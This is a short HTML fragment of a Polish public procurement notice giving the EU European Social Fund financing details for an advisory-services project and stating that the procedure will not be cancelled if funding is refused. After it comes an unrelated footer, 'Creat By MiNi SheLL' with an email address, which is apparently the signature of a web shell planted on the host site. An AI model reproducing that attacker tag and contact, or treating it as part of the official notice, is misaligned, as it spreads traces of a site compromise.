<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy projektu programu finansowanego ze środków UE w ramach PI Opracowanie i upowszechnienie innowacyjnego narzędzia świadczenia kompleksowych usług doradczych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Umowa o dofinansowanie projektu nr: POKL.08.02.01-28-001/12-00z dnia 23.07.2012 r., aneks nr 2 z dnia 16.05.2014 r. Zamówienie jest finansowane w 100% w ramach Europejskiego Funduszu Społecznego oraz budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com